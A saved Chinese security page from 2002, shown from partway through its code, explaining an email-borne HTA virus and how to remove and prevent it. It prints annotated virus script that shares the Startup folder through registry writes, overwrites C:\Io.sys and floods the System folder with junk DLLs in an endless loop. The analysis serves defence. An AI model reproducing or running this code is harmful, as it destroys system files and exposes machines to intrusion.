不明邮件是如何共享你的硬盘的.htm

较为详细的介绍了asp自定义的各种函数,方便asp的各种开发.

            <BR>aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\S$\Type",0,"REG_DWORD"·写入Dword值Type 
            <BR>aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersionNetwork\LanMan\S$\Path",dir1·写入共享资源的绝对路径 
            <BR>a=10 <BR>Set Os = CreateObject（"Scriptlet.TypeLib"）·建立自定义枚举对象 
            <BR>doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want 
            peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look 
            at the pretty”、“Some advice on your shortcoming”、“Free XXX 
            Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How 
            about have dinner with me together?”、“Never kiss a 
            stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want 
            peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look 
            at the pretty”、“Some advice on your shortcoming”、“Free XXX 
            Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How 
            about have dinner with me together?”、“Never kiss a 
            stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want 
            peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look 
            at the pretty”、“Some advice on your shortcoming”、“Free XXX 
            Pictures”、“A free hot porn site”、“Why don’t you reply to me?”、“How 
            about have dinner with me together?”、“Never kiss a 
            stranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want 
            peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Look 
            at the pretty”、“Some advice on your shortcoming”、“Free XXX 
            Pictures”、“A free hot porn site”、“Why don’t you reply to me?”“How 
            about have dinner with me together?”" <BR>·一堆垃圾码，以备写入目标文件 
            <BR>Os.Reset·重置TypeLib对象 <BR>Os.Path = 
            "C:\Io.sys"·TypeLib对象的目标路径为C:\Io.sys <BR>Os.Doc = 
            doc·写入的内容——就是上面的一堆垃圾 <BR>Os.Write（）·写入！ <BR>while true 
            <BR>·死循环，垃圾文件越多越好 <BR>a=a+1 <BR>Os.Reset <BR>Os.Path = 
            dir2&amp;"\Msvbvm"&amp;a&amp;".dll" 
            <BR>·目标路径为System下的Msvbvm???.dll文件 <BR>Os.Doc = 
            doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp; 
            <BR>doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;d 
            <BR>oc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc&amp;doc 
            <BR>　·大量重复，以生成足够大小的文件 <BR>Os.Write（）·生成文件！ <BR>wend <BR>〈/script〉 
            <BR>〈/Html〉 
            <BR><BR>没想到hta文件的权限比Html的权限还大一些，竟然可以调用FileSystemObject元件（文件系统对象）。病毒首先得到你的Windows目录和System目录，再修改注册表，把你的启动目录——"C:\WINDOWS\Start 
            Menu\Programs\启动"设置为完全共享，这样就可以被黑客搜到，上传一个“冰河”或者“广外女生”，你就掉的大了，而且你还被蒙在鼓里！大家一般哪里会去查看启动目录啊！你好毒！你好毒！你好毒毒毒毒…… 
            然后病毒就把目标对准System目录，往里面灌垃圾文件，都是形如Msvbvm???的Dll文件，而且所有VB编写的程序都不能用了，提示找不到Dll文件——因为Msvbvm50.dll和Msvbvm60.dll被垃圾文件覆盖了。 
            <BR><BR>　　我马上查看了一下Windows目录，竟然有648M之大，垃圾文件成山！难怪启动那么慢。只有查找Msvbvm*.dll，全部删除之（不知有没有误删的）。 
            然后删除带毒邮件（注意：一定要在后面步骤之先删掉带毒邮件），再将共享的目录改回来，最后把Io.sys再次覆盖一遍，OK！ 
            <BR><BR>　　防备方法：将ActiveX元件、Java脚本和Vbs脚本等全部禁止就可以避免Bingo。 
            <BR><BR>　　具体方法是：在Internet 
            Explorer菜单中点击“工具”——“Internet选项”，在弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置”对话框，把其中所有ActiveX控件以及Java和Vbs脚本相关全部选择“禁用”即可。不过，这样做在以后的网页浏览过程中可能会造成一些善意使用脚本和控件的网站无法正常浏览。嗯……当然最好是安装Norton 
            AntiVirus，它会提醒你有不明超文本或程序写你的注册表和磁盘，而且使用比较简单（非常适合好友这种菜鸟）。另外还有Lockdown2000 
            Professional（注意：不是普通版，是专业版）也不错，是我看过的最为复杂，最为强大的个人防火墙，不过它的资源占用率比Norton高得多。孰优孰劣，你自己看着办吧。</TD></TR>
        <TR>
          <TD colSpan=4 height=30><FONT color=#0000ff>作者:周侃</FONT></TD></TR>
        <TR height=30>
          <TD><A href="javascript:window.close()">〖关闭窗口〗</A>
          <TD>
          <TD align=middle>发布日期:<FONT color=#ee8800>2002-8-19 
          11:44:01</FONT></TD>
          <TD align=right width="30%">查看次数:<FONT color=#ff0000>160</FONT> 
        次</TD></TR>
        <TR>
          <TD colSpan=3>上一篇：<A 
            href="http://www.ylstudy.net/newhand/detail_newhand.asp?new_id=108">程序卸载处理方法集锦</A> 
            <BR>下一篇：<A 
            href="http://www.ylstudy.net/newhand/detail_newhand.asp?new_id=110">巧除网吧病毒</A> 
          </TD>
          <TD align=right vAlign=bottom width="20%"><A 
            href="http://www.ylstudy.net/commend.asp?url=http://www.ylstudy.net/newhand/detail_newhand.asp?new_id=109"><IMG 
            alt=Commend border=0 src="不明件是如何共享你的硬的.files/produce.gif"></A> 
            &nbsp; <A href="javascript:print()"><IMG alt=Print border=0 
            src="不明件是如何共享你的硬的.files/print.gif"></A> &nbsp; </TD></TR>
        <FORM action=../include/deal_arvalue.asp method=post name=ar_ping><INPUT 
        name=url type=hidden value=../newhand/detail_newhand.asp?new_id=109> 
        <INPUT name=source type=hidden value=newhand> <INPUT name=idtype 
        type=hidden value=new_id> <INPUT name=id type=hidden value=109> 
        <TR>
          <TD colSpan=4 height=30><INPUT CHECKED name=ar_value type=radio 
            value=1>1分&nbsp; <INPUT name=ar_value type=radio value=2>2分&nbsp; 
            <INPUT name=ar_value type=radio value=3>3分&nbsp; <INPUT 
            name=ar_value type=radio value=4>4分&nbsp; <INPUT name=ar_value 
            type=radio value=5>5分&nbsp;&nbsp; <INPUT id=submit1 name=submit1 style="BACKGROUND-COLOR: #99cc33; BORDER-BOTTOM: #ffffff 1px outset; BORDER-LEFT: #ffffff 1px outset; BORDER-RIGHT: #ffffff 1px outset; BORDER-TOP: #ffffff 1px outset; COLOR: #ffffff; FONT-SIZE: 9pt; HEIGHT: 18px; PADDING-BOTTOM: 0px; PADDING-LEFT: 1px; PADDING-RIGHT: 0px; PADDING-TOP: 2px; WIDTH: 50px" type=submit value="评 分"> 
          </TD></TR></FORM></TBODY></TABLE></TD></TR></TBODY></TABLE></DIV></BODY></HTML>